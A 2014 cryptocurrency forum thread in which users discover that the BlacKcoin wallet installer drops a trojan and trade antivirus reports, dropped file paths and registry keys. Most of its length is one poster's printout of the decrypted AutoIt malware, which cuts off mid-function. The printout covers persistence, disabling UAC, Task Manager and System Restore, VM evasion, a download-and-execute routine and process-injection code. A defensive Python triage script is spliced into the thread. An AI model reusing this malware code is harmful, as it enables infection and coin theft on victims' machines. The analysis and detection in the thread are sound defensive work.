Title: [ANN][BlacK] My account was hacked. I did not crea | no premine ✓ | launched NOW
Post by: AngryBirds on January 22, 2014, 10:08:21 PM
My account was hacked. I did not create this topic.
BlacKcoin is a SCAM.
Title: Re: [ANN][BlacK] BlacKcoin | no premine ✓ | launched NOW
Post by: CoinBreader on January 22, 2014, 10:09:45 PM
What's new on this one?
Edit: yep, plus it's stinky: https://www.virustotal.com/en/file/280533d2fa100e421c4dc9feeb5c317fe5503ee5b1a78ba1f39c97ee60c848cb/analysis/1390428774/
Trojan.Siggen6.2654
Title: Re: [ANN][BlacK] BlacKcoin | no premine ✓ | launched NOW
Post by: Nullu on January 22, 2014, 10:10:02 PM
- No-premine - Free of white supremacists
;D
Title: Re: [ANN][BlacK] BlacKcoin | no premine ✓ | launched NOW
Post by: andrealandia on January 22, 2014, 10:11:52 PM
Scrypt coin or CPU?
Title: Re: [ANN][BlacK] BlacKcoin | no premine ✓ | launched NOW
Post by: sesko on January 22, 2014, 10:12:15 PM
WATCH OUT TROJAN VIRUS INSIDE!!!
FREAKING AUTO SCRIPT VIRUS INSIDE, AV-NOD WENT BALLISTIC.
84922.vbs VBS/Runner.NBS trojan
Title: Re: [ANN][BlacK] BlacKcoin | no premine ✓ | launched NOW
Post by: singula on January 22, 2014, 10:12:53 PM
No source in the source archive.
(and as I see, possibly a trojan ... )
FAIL!
Title: Re: [ANN][BlacK] BlacKcoin | no premine ✓ | launched NOW
Post by: andrealandia on January 22, 2014, 10:14:04 PM
I'm analysing the wallet; it seems good: https://www.virustotal.com/it/file/280533d2fa100e421c4dc9feeb5c317fe5503ee5b1a78ba1f39c97ee60c848cb/analysis/1390428801/
Title: Re: [ANN][BlacK] BlacKcoin | no premine ✓ | launched NOW
Post by: deodecagone on January 22, 2014, 10:15:15 PM
Trojan confirmed, got some VBS put here and there :D
this dev is such a retard
Title: Re: [ANN][BlacK] BlacKcoin | no premine ✓ | launched NOW
Post by: Benezivas on January 22, 2014, 10:17:24 PM
This and the block distribution made for an instamine.
Title: Re: [ANN][BlacK] BlacKcoin | no premine ✓ | launched NOW
Post by: AMAZONBTC on January 22, 2014, 10:17:40 PM
fucking idiots
Title: Re: [ANN][BlacK] BlacKcoin | no premine ✓ | launched NOW
Post by: Snard on January 22, 2014, 10:18:57 PM
It is an AutoIt trojan.
Title: Re: [ANN][BlacK] BlacKcoin | no premine ✓ | launched NOW
Post by: Cloudpost on January 22, 2014, 10:19:54 PM
Fuck, I installed the wallet on my empty mining machine. What to do now: try Dr.Web CureIt on it or something, or just reinstall Windows? :D
Title: Re: [ANN][BlacK] BlacKcoin | no premine ✓ | launched NOW
Post by: Snard on January 22, 2014, 10:20:30 PM
Always safer to reinstall.
Title: Re: [ANN][BlacK] BlacKcoin | no premine ✓ | launched NOW
Post by: Dapk1nmasta on January 22, 2014, 10:20:50 PM
The number of racist jokes I could make right now... TOO DAMN HIGH!
Something like this was bound to happen sooner or later. Someone should launch this on a VPS/VM and see what this program connects to, resolve the no-ip host (assuming OP was smart enough to use it), and fuck around with OP a bit :D
Title: Re: [ANN][BlacK] BlacKcoin | no premine ✓ | launched NOW
Post by: andrealandia on January 22, 2014, 10:21:37 PM
How do I find out if there's a virus in the .zip?
Title: Re: [ANN][BlacK] BlacKcoin | no premine ✓ | launched NOW
Post by: Nullu on January 22, 2014, 10:21:48 PM
Title: Re: [ANN][BlacK] BlacKcoin | no premine ✓ | launched NOW
Post by: sesko on January 22, 2014, 10:22:17 PM
Here you go:
Description of the virus; don't cry if you lose some coins from your wallets.
spywareremove.com/file/displaydriversexe-337529/
Title: Re: [ANN][BlacK] BlacKcoin | no premine ✓ | launched NOW
Post by: Cloudpost on January 22, 2014, 10:25:06 PM
So sad. It's too late: I just checked the archive with the latest Kaspersky AV, and after it confirmed the archive was clean I tried that shit on one of my mining rigs (it's literally empty, just Windows and a few programs on there).
What actually does that trojan do?
Title: Re: [ANN][BlacK] BlacKcoin | no premine ✓ | launched NOW
Post by: Nullu on January 22, 2014, 10:25:17 PM
What's new on this one?
Edit: yep, plus it's stinky: https://www.virustotal.com/en/file/280533d2fa100e421c4dc9feeb5c317fe5503ee5b1a78ba1f39c97ee60c848cb/analysis/1390428774/
Trojan.Siggen6.2654
Many wallets have at least one hit. It's called a false positive. Not that I'm downloading the wallet. I have no interest in this coin.
Title: Re: [ANN][BlacK] BlacKcoin | no premine ✓ | launched NOW
Post by: kaene on January 22, 2014, 10:26:28 PM
Please, add SOURCE CODE immediately so that we can really start mining this coin, otherwise FAIL
Title: Re: [ANN][BlacK] BlacKcoin | no premine ✓ | launched NOW
Post by: sesko on January 22, 2014, 10:28:34 PM
After installing the wallet (installer), you get a file in Task Manager (processes): displaydriver.exe
Description here: spywareremove.com/file/displaydriversexe-337529/
Title: Re: [ANN][BlacK] BlacKcoin | no premine ✓ | launched NOW
Post by: Snard on January 22, 2014, 10:31:42 PM
Please, add SOURCE CODE immediately so that we can really start mining this coin, otherwise FAIL
That's a joke right?
Title: Re: [ANN][BlacK] BlacKcoin | no premine ✓ | launched NOW
Post by: deodecagone on January 22, 2014, 10:32:34 PM
Yes, you also get a VBS file starting it in your startup:
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run "displaydrivers.exe ZSABzswGD"
Title: Re: [ANN][BlacK] BlacKcoin | no premine ✓ | launched NOW
Post by: kaene on January 22, 2014, 10:34:30 PM
Please, add SOURCE CODE immediately so that we can really start mining this coin, otherwise FAIL
That's a joke right?
Actually, I thought the malware report was a false alarm :P
Title: Re: [ANN][BlacK] BlacKcoin | no premine ✓ | launched NOW
Post by: adversor on January 22, 2014, 10:35:55 PM
look at the last posts of this guy:
https://bitcointalk.org/index.php?action=profile;u=117496;sa=showPosts;start=0
Title: Re: [ANN][BlacK] BlacKcoin | no premine ✓ | launched NOW
Post by: sussex on January 22, 2014, 10:38:37 PM
look at the last posts of this guy:
https://bitcointalk.org/index.php?action=profile;u=117496;sa=showPosts;start=0
LOL
Title: Re: [ANN][BlacK] BlacKcoin | no premine ✓ | launched NOW
Post by: sesko on January 22, 2014, 10:42:28 PM
Yes, you also get a VBS file starting it in your startup:
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run "displaydrivers.exe ZSABzswGD"
AV log:
file C:\Users\*******\kpjsf\84922.vbs - VBS/Runner.NBS trojan - cleaned by deleting - quarantined - Event occurred on a new file created by the application: C:\Users\*****\kpjsf\displaydrivers.exe.
The antivirus cleaned it, but it pops up again every time. So I killed the process, then deleted the folder kpjsf. Hope everything is OK. But it's true, he doesn't need a premine on this coin: he will premine your wallets :)
Title: Re: [ANN][BlacK] BlacKcoin | no premine ✓ | launched NOW
Post by: Snard on January 22, 2014, 10:51:39 PM
Files and folders may have random names. The trojan creates a RunOnce entry that starts a VBS script. This script launches a randomly named cmd script, such as C:\Users\User\kpjsf\74851.cmd. That cmd script starts C:\Users\User\kpjsf\displaydrivers.exe with the argument ZSABzswGD. displaydrivers.exe is AutoIt3 and ZSABzswGD is the encrypted AutoIt script.

Trojan files added:
C:\Users\User\kpjsf\
C:\Users\User\kpjsf\74851.cmd
C:\Users\User\kpjsf\84922.vbs
C:\Users\User\kpjsf\ZSABzswGD
C:\Users\User\kpjsf\blackcoin-0.8.6-win32-setup.exe
C:\Users\User\kpjsf\displaydrivers.exe
C:\Users\User\kpjsf\lcOfvbDCSMZ.CCP
C:\Users\User\kpjsf\vbmnWmLUba.CHH

Trojan registry keys added:
HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce\kpjsf = C:\Users\User\kpjsf\84922.vbs

Wallet files added:
C:\Program Files (x86)\Blackcoin\
C:\Program Files (x86)\Blackcoin\blackcoin-qt.exe
C:\Program Files (x86)\Blackcoin\daemon\
C:\Program Files (x86)\Blackcoin\daemon\blackcoind.exe
C:\Program Files (x86)\Blackcoin\uninstall.exe
C:\Users\User\AppData\Roaming\Blackcoin\
C:\Users\User\AppData\Roaming\Blackcoin\.lock
C:\Users\User\AppData\Roaming\Blackcoin\blocks\
C:\Users\User\AppData\Roaming\Blackcoin\blocks\blk00000.dat
C:\Users\User\AppData\Roaming\Blackcoin\blocks\index\
C:\Users\User\AppData\Roaming\Blackcoin\blocks\index\000003.log
C:\Users\User\AppData\Roaming\Blackcoin\blocks\index\CURRENT
C:\Users\User\AppData\Roaming\Blackcoin\blocks\index\LOCK
C:\Users\User\AppData\Roaming\Blackcoin\blocks\index\LOG
C:\Users\User\AppData\Roaming\Blackcoin\blocks\index\MANIFEST-000002
C:\Users\User\AppData\Roaming\Blackcoin\chainstate\
C:\Users\User\AppData\Roaming\Blackcoin\chainstate\000003.log
C:\Users\User\AppData\Roaming\Blackcoin\chainstate\CURRENT
C:\Users\User\AppData\Roaming\Blackcoin\chainstate\LOCK
C:\Users\User\AppData\Roaming\Blackcoin\chainstate\LOG
C:\Users\User\AppData\Roaming\Blackcoin\chainstate\MANIFEST-000002
C:\Users\User\AppData\Roaming\Blackcoin\database\
C:\Users\User\AppData\Roaming\Blackcoin\database\log.0000000001
C:\Users\User\AppData\Roaming\Blackcoin\db.log
C:\Users\User\AppData\Roaming\Blackcoin\debug.log
C:\Users\User\AppData\Roaming\Blackcoin\wallet.dat
C:\Users\User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Blackcoin\
C:\Users\User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Blackcoin\Blackcoin.lnk
C:\Users\User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Blackcoin\Uninstall Blackcoin.lnk

Wallet registry keys added:
HKCU\Software\Blackcoin
HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\Blackcoin
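The chain Snard lists above (RunOnce value, hidden VBS under the user profile, cmd wrapper, AutoIt stub) is easy to spot from two artefacts you can pull off a host: a `reg export` of the Run/RunOnce keys and the output of `attrib`. The script below is an added example, not code from the thread or from any of the posters; the registry export and the `attrib` listing it parses are constructed to match the paths in the post and are not captures from an infected machine. Path layout checks (profile root vs. AppData) and the hidden+system attribute test are the assumptions it makes about what "looks like the dropper".

```python
import re
from pathlib import PureWindowsPath

SCRIPT_EXTS = {".vbs", ".vbe", ".js", ".jse", ".wsf", ".hta", ".cmd", ".bat"}
AUTORUN_KEYS = ("\\currentversion\\run", "\\currentversion\\runonce")

# Constructed sample: what `reg export HKCU\Software\Microsoft\Windows\CurrentVersion` yields
REG_EXPORT = r'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce]
"kpjsf"="C:\\Users\\User\\kpjsf\\84922.vbs"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"OneDrive"="\"C:\\Users\\User\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe\" /background"
'''

# Constructed sample: `attrib /s C:\Users\User\*` style lines (attribute letters, then path)
ATTRIB_LISTING = r'''A  SHR      C:\Users\User\kpjsf\84922.vbs
A  SHR      C:\Users\User\kpjsf\74851.cmd
A  SHR      C:\Users\User\kpjsf\displaydrivers.exe
A           C:\Users\User\AppData\Local\Microsoft\OneDrive\OneDrive.exe
'''


def parse_reg_export(text):
    """Yield (key, value_name, command) for string values under Run/RunOnce keys."""
    key = None
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            key = line[1:-1]
        elif key and line.startswith('"') and key.lower().endswith(AUTORUN_KEYS):
            m = re.match(r'"([^"]*)"="(.*)"$', line)
            if m:
                # .reg files escape quotes and backslashes inside string data
                yield key, m.group(1), m.group(2).replace('\\"', '"').replace("\\\\", "\\")


def parse_attrib(text):
    """Map lower-cased path -> set of attribute letters from `attrib` output."""
    attrs = {}
    for line in text.splitlines():
        m = re.match(r"^([A-Z ]*?)\s+([A-Za-z]:\\.*)$", line)
        if m:
            attrs[m.group(2).strip().lower()] = set(m.group(1).replace(" ", ""))
    return attrs


def first_path(command):
    """Executable or script path at the front of an autorun command line."""
    command = command.strip()
    if command.startswith('"'):
        return command[1:command.index('"', 1)]
    return command.split(" ")[0]          # unquoted paths containing spaces are not handled


def triage(reg_text, attrib_text):
    """Return autorun entries that look like the dropper's chain, each with its reasons."""
    attrs = parse_attrib(attrib_text)
    findings = []
    for key, name, command in parse_reg_export(reg_text):
        target = first_path(command)
        parts = [p.lower() for p in PureWindowsPath(target).parts]
        reasons = []
        if PureWindowsPath(target).suffix.lower() in SCRIPT_EXTS:
            reasons.append("autostart runs a script interpreter")
        if len(parts) > 3 and parts[1] == "users" and parts[3] != "appdata":
            reasons.append("target sits in a folder dropped directly under the user profile")
        if {"S", "H"} <= attrs.get(target.lower(), set()):
            reasons.append("target has hidden+system attributes")
        if reasons:
            findings.append({"key": key, "value": name, "target": target, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in triage(REG_EXPORT, ATTRIB_LISTING):
        print(f["key"], f["value"], f["target"])
        for r in f["reasons"]:
            print("   -", r)
```

On a live host you would feed it `reg export HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce` plus `attrib /s` over the profile; the benign OneDrive entry is there to show that "lives under C:\Users" alone is not a signal, since AppData is where legitimate per-user software installs.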
Title: Re: [ANN][BlacK] BlacKcoin | no premine ✓ | launched NOW
Post by: Rub3n on January 22, 2014, 10:56:01 PM
look at the last posts of this guy:
https://bitcointalk.org/index.php?action=profile;u=117496;sa=showPosts;start=0
LOL What a joke
Title: Re: [ANN][BlacK] BlacKcoin | no premine ✓ | launched NOW
Post by: mycointr on January 22, 2014, 10:56:53 PM
I installed it inside Sandboxie; a cmd window started to pop up, even after I exited Sandboxie. I restarted Windows and scanned with Malwarebytes; nothing seems wrong and I can't find the listed files. Is there a cleaner that we can be 100% sure of?
Title: Re: [ANN][BlacK] BlacKcoin | no premine ✓ | launched NOW
Post by: Snard on January 22, 2014, 11:00:44 PM
This is the AutoIt script being executed:

#NoTrayIcon
If ProcessExists("avastui.exe") Then Sleep(20000)
$path = "kpjsf"
$uniscriptdir = FileGetShortName(@ScriptDir)
$uniscriptfullpath = FileGetShortName(@ScriptFullPath)
$unicode_startup = FileGetShortName(@StartupDir)
$unicode_windows = FileGetShortName(@WindowsDir)
$unicode_system = FileGetShortName(@SystemDir)
$unicode_userprofile = FileGetShortName(@UserProfileDir)
$win_userprofile = "%userprofile%\"
FileSetAttrib($uniscriptdir, "+SHR")
Local $delay = IniRead($uniscriptdir & "\lcOfvbDCSMZ.CCP", "3915629", "2981136", "NotFound")
If $delay = "8872084" Then
    delay()
Else
EndIf
Local $mutex = IniRead($uniscriptdir & "\lcOfvbDCSMZ.CCP", "mutex1", "mutex2", "NotFound")
If $mutex = "mutex3" Then
    mutex()
Else
EndIf
Local $startup = IniRead($uniscriptdir & "\lcOfvbDCSMZ.CCP", "5342847", "1213271", "NotFound")
If $startup = "6122302" Then
    startup()
Else
EndIf
Local $antis = IniRead($uniscriptdir & "\lcOfvbDCSMZ.CCP", "3144514", "8404683", "NotFound")
If $antis = "3575235" Then
    antis()
Else
EndIf
Local $fake = IniRead($uniscriptdir & "\lcOfvbDCSMZ.CCP", "fake1", "fake2", "NotFound")
If $fake = "fake3" Then
    fakemessage()
Else
EndIf
Local $botkiller = IniRead($uniscriptdir & "\lcOfvbDCSMZ.CCP", "botkiller1", "botkiller2", "NotFound")
If $botkiller = "botkiller3" Then
    botkiller()
Else
EndIf
Local $downloader = IniRead($uniscriptdir & "\lcOfvbDCSMZ.CCP", "downloader1", "downloader2", "NotFound")
If $downloader = "downloader3" Then
    downloader()
Else
EndIf
Local $uac = IniRead($uniscriptdir & "\lcOfvbDCSMZ.CCP", "uac1", "uac2", "NotFound")
If $uac = "uac3" Then
    disable_uac()
Else
EndIf
Local $systemrestore = IniRead($uniscriptdir & "\lcOfvbDCSMZ.CCP", "systemrestore1", "systemrestore2", "NotFound")
If $systemrestore = "systemrestore3" Then
    disable_syste_restore()
Else
EndIf
Local $antitask = IniRead($uniscriptdir & "\lcOfvbDCSMZ.CCP", "antitask1", "antitask2", "NotFound")
If $antitask = "antitask3" Then
    antitask()
Else
EndIf

Func delay()
    $counter = 0
    While $counter <= 5
        Sleep(5000)
        ShellExecute(@SystemDir & "\mshta.exe")
        $counter = $counter + 1
        _rundos("taskkill /IM mshta.exe")
    WEnd
EndFunc

Func systemhide()
    RegWrite("HKCU64\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer", "NoFolderOptions", "REG_DWORD", 1)
    RegWrite("HKCU64\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced", "ShowSuperHidden", "REG_DWORD", 0)
EndFunc

Func fakemessage()
    $type = IniRead($uniscriptdir & "\lcOfvbDCSMZ.CCP", "messagetype1", "messagetype2", "NotFound")
    $title = IniRead($uniscriptdir & "\lcOfvbDCSMZ.CCP", "messagetitle1", "messagetitle2", "NotFound")
    $message = IniRead($uniscriptdir & "\lcOfvbDCSMZ.CCP", "messagetext1", "messagetext2", "NotFound")
    If FileExists($unicode_userprofile & "\" & $path & "\check.txt") Then
    Else
        MsgBox($type, $title, $message)
        FileWrite($unicode_userprofile & "\" & $path & "\check.txt", "")
    EndIf
EndFunc

Func mutex()
    $scriptname = "displaydrivers.exe"
    If UBound(ProcessList($scriptname)) > 2 Then Exit
EndFunc

Func antitask()
    $read_antitask = RegRead("HKCU64\Software\Microsoft\Windows\CurrentVersion\Policies\System", "DisableTaskMgr")
    If NOT ($read_antitask = "1") Then
        RegWrite("HKCU64\Software\Microsoft\Windows\CurrentVersion\Policies\System", "DisableTaskMgr", "REG_DWORD", "1")
    EndIf
EndFunc

Func disable_uac()
    $read_uac = RegRead("HKLM64\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System", "EnableLUA")
    If NOT ($read_uac = "0") Then
        RegWrite("HKLM64\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System", "EnableLUA", "REG_DWORD", "0")
    EndIf
EndFunc

Func startup()
    $buac = _checkelevationenabled()
    If $buac = 0 Then
    Else
        FileCreateShortcut($unicode_userprofile & "\" & $path & "\84922.vbs", $unicode_startup & "\start.lnk")
        FileSetAttrib($unicode_startup & "\start.lnk", "+SH")
    EndIf
    RegWrite("HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce", $path, "REG_SZ", $unicode_userprofile & "\" & $path & "\84922.vbs")
    If NOT FileExists($unicode_userprofile & "\" & $path & "\84922.vbs") Then
        Local $bat = FileOpen($unicode_userprofile & "\" & $path & "\74851.cmd", 1)
        $autoit3 = "displaydrivers.exe"
        FileWrite($bat, "@echo off" & @CRLF & "cd " & $win_userprofile & $path & "\" & @CRLF & "start " & $autoit3 & " " & @ScriptName)
        FileClose($bat)
        Local $vbs = FileOpen($unicode_userprofile & "\" & $path & "\84922.vbs", 1)
        FileWrite($vbs, "const Hidden = 0" & @CRLF & "const WaitOnReturn = true" & @CRLF & 'File ="""' & $unicode_userprofile & "\" & $path & "\" & '74851.cmd"""' & @CRLF & 'set WshShell = CreateObject("WScript.Shell")' & @CRLF & "WshShell.Run file, Hidden, WaitOnReturn" & @CRLF & "wscript.quit")
        FileClose($vbs)
        RegWrite("HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce", $path, "REG_SZ", $unicode_userprofile & "\" & $path & "\84922.vbs")
        FileSetAttrib($unicode_userprofile & "\" & $path & "\84922.vbs", "+SHR")
        FileSetAttrib($unicode_userprofile & "\" & $path & "\74851.cmd", "+SHR")
        If FileExists($unicode_startup & "\start.lnk") Then
            FileDelete($unicode_startup & "\start.lnk")
        EndIf
    Else
    EndIf
EndFunc

Func _checkelevationenabled()
    $read_uac = RegRead("HKLM64\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System", "EnableLUA")
    If @error Then Return
    Local $struct = DllStructCreate("BOOL")
    Local $artn = DllCall("kernel32.dll", "DWORD", "CheckElevationEnabled", "ptr", DllStructGetPtr($struct))
    If @error Then
        Return SetError(@error)
    EndIf
    Return SetError($artn[0], 0, DllStructGetData($struct, 1))
EndFunc

Func antis()
    If WinGetText("Program Manager") = "0" Then
        Exit
    Else
    EndIf
    If ProcessExists("VboxService.exe") Then
        Exit
    EndIf
    If ProcessExists("VMwaretray.exe") Then
        Exit
    EndIf
EndFunc

Func persistence()
    If NOT ProcessExists("RegSvcs.exe") AND NOT ProcessExists("RegAsm.exe") AND NOT ProcessExists("AppLaunch.exe") AND NOT ProcessExists("twunk_32.exe") AND NOT ProcessExists("newdev.exe") AND NOT ProcessExists("ndadmin.exe") Then
        $pathtovbs = ($uniscriptdir & "\" & "run.vbs")
        ShellExecute($pathtovbs)
        Exit
    EndIf
EndFunc

Func downloader()
    If FileExists($unicode_userprofile & "\" & $path & "\dl.txt") Then
    Else
        FileWrite($unicode_userprofile & "\" & $path & "\dl.txt", "")
        $random_download_name = Random(10000, 99999, 1) & ".exe"
        Local $hdownload = InetGet("replace-me-url", $unicode_userprofile & "\" & $random_download_name, 1, 1)
        Do
            Sleep(250)
        Until InetGetInfo($hdownload, 2)
        Local $nbytes = InetGetInfo($hdownload, 0)
        InetClose($hdownload)
        ShellExecute($unicode_userprofile & "\" & $random_download_name)
    EndIf
EndFunc

Func bsod()
    $a = ProcessList()
    For $i = 1 To UBound($a) - 1
        ProcessClose($a[$i][0])
    Next
    Exit
EndFunc

Func botkiller()
    RegDelete("HKCU64\SOFTWARE\Microsoft\Windows\CurrentVersion\Run")
    RegWrite("HKCU64\SOFTWARE\Microsoft\Windows\CurrentVersion\Run")
    RegDelete("HKLM64\SOFTWARE\Microsoft\Windows\CurrentVersion\Run")
    RegWrite("HKLM64\SOFTWARE\Microsoft\Windows\CurrentVersion\Run")
    FileDelete(@StartupDir & "\*.*")
EndFunc

Func disable_syste_restore()
    If FileExists($uniscriptdir & "\check.txt") Then
    Else
        RegDelete("HKLM64\Software\Microsoft\Windows NT\CurrentVersion\SPP\Clients")
        FileWrite($uniscriptdir & "\check.txt", "")
    EndIf
EndFunc

Func _rundos($scommand)
    Local $nresult = RunWait(@ComSpec & " /C " & $scommand, "", @SW_HIDE)
    Return SetError(@error, @extended, $nresult)
EndFunc

Global Const $prov_rsa_full = 1
Global Const $prov_rsa_aes = 24
Global Const $crypt_verifycontext = -268435456
Global Const $hp_hashsize = 4
Global Const $hp_hashval = 2
Global Const $crypt_exportable = 1
Global Const $crypt_userdata = 1
Global Const $calg_md2 = 32769
Global Const $calg_md4 = 32770
Global Const $calg_md5 = 32771
Global Const $calg_sha1 = 32772
Global Const $calg_3des = 26115
Global Const $calg_aes_128 = 26126
Global Const $calg_aes_192 = 26127
Global Const $calg_aes_256 = 26128
Global Const $calg_des = 26113
Global Const $calg_rc2 = 26114
Global Const $calg_rc4 = 26625
Global Const $calg_userkey = 0
Global $__g_acryptinternaldata[3]

Func _crypt_encryptdata($vdata, $vcryptkey, $ialg_id, $ffinal = True)
    Local $hbuff
    Local $ierror
    Local $vreturn
    Local $reqbuffsize
    Local $aret
    _crypt_startup()
    Do
        If $ialg_id <> $calg_userkey Then
            $vcryptkey = _crypt_derivekey($vcryptkey, $ialg_id)
            If @error Then
                $ierror = 1
                $vreturn = -1
                ExitLoop
            EndIf
        EndIf
        $aret = DllCall(__crypt_dllhandle(), "bool", "CryptEncrypt", "handle", $vcryptkey, "handle", 0, "bool", $ffinal, "dword", 0, "ptr", 0, "dword*", BinaryLen($vdata), "dword", 0)
        If @error OR NOT $aret[0] Then
            $ierror = 2
            $vreturn = -1
            ExitLoop
        EndIf
        $reqbuffsize = $aret[6]
        $hbuff = DllStructCreate("byte[" & $reqbuffsize & "]")
        DllStructSetData($hbuff, 1, $vdata)
        $aret = DllCall(__crypt_dllhandle(), "bool", "CryptEncrypt", "handle", $vcryptkey, "handle", 0, "bool", $ffinal, "dword", 0, "struct*", $hbuff, "dword*", BinaryLen($vdata), "dword", DllStructGetSize($hbuff))
        If @error OR NOT $aret[0] Then
            $ierror = 3
            $vreturn = -1
            ExitLoop
        EndIf
        $ierror = 0
        $vreturn = DllStructGetData($hbuff, 1)
    Until True
    Return $vreturn
EndFunc

Func _crypt_decryptdata($vdata, $vcryptkey, $ialg_id, $ffinal = True)
    Local $hbuff
    Local $ierror
    Local $vreturn
    Local $htempstruct
    Local $iplaintextsize
    Local $aret
    _crypt_startup()
    Do
        If $ialg_id <> $calg_userkey Then
            $vcryptkey = _crypt_derivekey($vcryptkey, $ialg_id)
            If @error Then
                $ierror = 1
                $vreturn = -1
                ExitLoop
            EndIf
        EndIf
        $hbuff = DllStructCreate("byte[" & BinaryLen($vdata) + 1000 & "]")
        DllStructSetData($hbuff, 1, $vdata)
        $aret = DllCall(__crypt_dllhandle(), "bool", "CryptDecrypt", "handle", $vcryptkey, "handle", 0, "bool", $ffinal, "dword", 0, "struct*", $hbuff, "dword*", BinaryLen($vdata))
        If @error OR NOT $aret[0] Then
            $ierror = 2
            $vreturn = -1
            ExitLoop
        EndIf
        $iplaintextsize = $aret[6]
        $htempstruct = DllStructCreate("byte[" & $iplaintextsize & "]", DllStructGetPtr($hbuff))
        $ierror = 0
        $vreturn = DllStructGetData($htempstruct, 1)
    Until True
    Return $vreturn
EndFunc

Func _crypt_startup()
    If __crypt_refcount() = 0 Then
        Local $hadvapi32 = DllOpen("Advapi32.dll")
        If @error Then Return SetError(1, 0, False)
        __crypt_dllhandleset($hadvapi32)
        Local $aret
        Local $iproviderid = $prov_rsa_aes
        If @OSVersion = "WIN_2000" Then $iproviderid = $prov_rsa_full
        $aret = DllCall(__crypt_dllhandle(), "bool", "CryptAcquireContext", "handle*", 0, "ptr", 0, "ptr", 0, "dword", $iproviderid, "dword", $crypt_verifycontext)
        If @error OR NOT $aret[0] Then
            DllClose(__crypt_dllhandle())
            Return SetError(2, 0, False)
        Else
            __crypt_contextset($aret[1])
        EndIf
    EndIf
    __crypt_refcountinc()
    Return True
EndFunc

Func _crypt_derivekey($vpassword, $ialg_id, $ihash_alg_id = $calg_md5)
    Local $aret
    Local $hcrypthash
    Local $hbuff
    Local $ierror
    Local $vreturn
    _crypt_startup()
    Do
        $aret = DllCall(__crypt_dllhandle(), "bool", "CryptCreateHash", "handle", __crypt_context(), "uint", $ihash_alg_id, "ptr", 0, "dword", 0, "handle*", 0)
        If @error OR NOT $aret[0] Then
            $ierror = 1
            $vreturn = -1
            ExitLoop
        EndIf
        $hcrypthash = $aret[5]
        $hbuff = DllStructCreate("byte[" & BinaryLen($vpassword) & "]")
        DllStructSetData($hbuff, 1, $vpassword)
        $aret = DllCall(__crypt_dllhandle(), "bool", "CryptHashData", "handle", $hcrypthash, "struct*", $hbuff, "dword", DllStructGetSize($hbuff), "dword", $crypt_userdata)
        If @error OR NOT $aret[0] Then
            $ierror = 2
            $vreturn = -1
            ExitLoop
        EndIf
        $aret = DllCall(__crypt_dllhandle(), "bool", "CryptDeriveKey", "handle", __crypt_context(), "uint", $ialg_id, "handle", $hcrypthash, "dword", $crypt_exportable, "handle*", 0)
        If @error OR NOT $aret[0] Then
            $ierror = 3
            $vreturn = -1
            ExitLoop
        EndIf
        $ierror = 0
        $vreturn = $aret[5]
    Until True
    If $hcrypthash <> 0 Then DllCall(__crypt_dllhandle(), "bool", "CryptDestroyHash", "handle", $hcrypthash)
    Return SetError($ierror, 0, $vreturn)
EndFunc

Func __crypt_contextset($hcryptcontext)
    $__g_acryptinternaldata[2] = $hcryptcontext
EndFunc

Func __crypt_context()
    Return $__g_acryptinternaldata[2]
EndFunc

Func __crypt_dllhandleset($hadvapi32)
    $__g_acryptinternaldata[1] = $hadvapi32
EndFunc

Func __crypt_dllhandle()
    Return $__g_acryptinternaldata[1]
EndFunc

Func __crypt_refcountdec()
    If $__g_acryptinternaldata[0] > 0 Then $__g_acryptinternaldata[0] -= 1
EndFunc

Func __crypt_refcountinc()
    $__g_acryptinternaldata[0] += 1
EndFunc

Func __crypt_refcount()
    Return $__g_acryptinternaldata[0]
EndFunc

submain()

Func submain()
    $skey = IniRead($uniscriptdir & "\lcOfvbDCSMZ.CCP", "6755425", "6755425", "NotFound")
    $sapppath1 = FileGetShortName(@ScriptDir & "\vbmnWmLUba.CHH")
    $sapppath = FileRead(FileOpen($sapppath1, 16))
    $sarquive = _crypt_decryptdata($sapppath, $skey, $calg_rc2)
    _runpe($sarquive)
EndFunc

Func info($getfiledata, $stringtoget)
    Return StringTrimLeft($getfiledata, StringInStr($getfiledata, $stringtoget) - 1 + StringLen($stringtoget))
EndFunc

Func _runpe($bbinaryimage, $scommandline = "")
    #Region 1. DETERMINE INTERPRETER TYPE
    Local $fautoitx64 = @AutoItX64
    #Region 2. PREDPROCESSING PASSED
    Local $bbinary = Binary($bbinaryimage)
    Local $tbinary = DllStructCreate("BYTE[" & BinaryLen($bbinary) & "]")
    DllStructSetData($tbinary, 1, $bbinary)
    Local $ppointer = DllStructGetPtr($tbinary)
    #Region 3. CREATING NEW PROCESS
    $inject_net2_regsvc = ($unicode_windows & "\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe")
    $inject_net4_regsvc = ($unicode_windows & "\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe")
    $inject_net2_regasm = ($unicode_windows & "\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe")
    $inject_net4_regasm = ($unicode_windows & "\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe")
    $inject_net2_applaunch = ($unicode_windows & "\Microsoft.NET\Framework\v2.0.50727\AppLaunch.exe")
    $inject_net4_applaunch = ($unicode_windows & "\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe")
    $inject_newdev = ($unicode_system & "\newdev.exe")
    $inject_twunk_32 = ($unicode_windows & "\twunk_32.exe")
    $inject_ndadmin = ($unicode_system & "\ndadmin.exe")
    If FileExists($inject_net4_regsvc) Then
